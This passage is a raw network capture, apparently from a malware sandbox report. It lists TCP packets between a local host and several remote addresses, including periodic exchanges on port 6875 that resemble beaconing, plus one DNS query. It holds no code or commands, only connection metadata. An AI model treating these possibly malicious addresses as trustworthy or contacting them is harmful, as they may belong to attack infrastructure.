                                                                                                                                                                              Oct 14, 2024 11:06:25.897526979 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897533894 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897548914 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897551060 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897562027 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897572994 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897592068 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897593021 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897607088 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897613049 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897618055 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897631884 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897665977 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897665977 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897706985 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897718906 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897730112 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897741079 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897752047 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897758961 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897789955 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897802114 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897813082 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897823095 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897834063 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897844076 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897855043 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897856951 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897866964 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897880077 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897886992 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897895098 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897958994 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897967100 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897980928 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897993088 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898025036 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898027897 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898027897 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898042917 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898049116 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898081064 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898154020 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898164034 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898175955 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898188114 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898201942 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898201942 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898222923 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898233891 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898236036 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898246050 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898263931 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898274899 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898298025 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898298025 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898323059 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898346901 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898359060 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898370028 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898394108 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898437023 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898447990 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898461103 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898472071 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898482084 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898497105 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898508072 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898519993 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898541927 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898541927 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898578882 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898590088 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898602009 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898616076 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898616076 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898652077 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898689032 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898699999 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898722887 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898725986 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898735046 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898741007 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898752928 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898773909 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898780107 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898780107 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898788929 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898829937 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898891926 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898905993 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898910999 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898942947 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898961067 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.898998976 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.898999929 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.899024963 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.899036884 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.899049044 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.899060011 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.899076939 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.899097919 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.899132967 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.899146080 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.899159908 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.899175882 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.899188042 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.899192095 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.899200916 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.899224043 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.899228096 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.899238110 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.899249077 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.899260044 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.899305105 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.899305105 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.902127028 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902138948 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902157068 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902163029 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902163029 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.902169943 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902182102 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902183056 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.902205944 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.902237892 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902249098 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902261019 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902277946 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.902287006 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902304888 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902312994 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.902317047 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902331114 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902334929 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.902343988 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.902365923 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.991677999 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991698980 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991710901 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991729975 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991739988 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.991739988 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.991800070 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991832972 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991844893 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991856098 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991863966 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.991877079 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.991931915 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991944075 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991955042 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.991967916 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992017031 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992072105 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992084026 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992094994 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992115974 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992126942 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992136955 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992150068 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992150068 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992151976 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992176056 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992187023 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992199898 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992207050 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992207050 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992212057 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992233038 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992233992 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992244959 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992255926 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992266893 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992278099 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992288113 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992288113 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992290974 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992310047 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992356062 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992367983 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992379904 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992389917 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992400885 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992410898 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992410898 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992420912 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992436886 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992445946 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992458105 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992468119 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992486000 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992494106 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992506981 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992517948 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992527008 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992541075 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992541075 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992541075 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992665052 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992665052 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992686033 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992697001 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992707014 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992708921 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992719889 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992731094 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992733002 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992743969 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992754936 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992768049 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992778063 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992778063 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992810011 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992820978 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992831945 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992846012 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992846966 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992846966 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992865086 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992876053 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992886066 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992897034 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992908001 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992908955 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992908955 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992923975 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992929935 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992937088 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992948055 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992964983 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.992985010 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.992985010 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.993006945 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993017912 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993027925 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993036985 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993048906 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993052006 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.993067980 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.993068933 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993082047 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993089914 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.993093014 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993104935 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993115902 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993128061 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993145943 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.993145943 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.993226051 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993237972 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993247032 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993258953 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993269920 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993279934 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993283033 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.993283033 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.993293047 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993304968 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993318081 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993318081 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.993318081 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.993400097 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993412018 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993422985 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993433952 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993437052 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.993438005 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.993448019 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.993547916 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:26.141428947 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:36.127262115 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:36.129101992 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                                                              Oct 14, 2024 11:06:36.135113955 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:07:06.142669916 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:07:06.145452976 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                                                              Oct 14, 2024 11:07:06.150259972 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:07:30.024271011 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                              Oct 14, 2024 11:07:30.321633101 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                              Oct 14, 2024 11:07:31.023715019 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                              Oct 14, 2024 11:07:32.224812031 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                              Oct 14, 2024 11:07:34.720819950 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                              Oct 14, 2024 11:07:36.159334898 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:07:36.160161018 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                                                              Oct 14, 2024 11:07:36.164988995 CEST687549173135.148.195.248192.168.2.22

                                                                                                                                                                              UDP Packets

                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Oct 14, 2024 11:05:42.872838020 CEST5456253192.168.2.228.8.8.8
                                                                                                                                                                              Oct 14, 2024 11:05:42.884692907 CEST53545628.8.8.8192.168.2.22
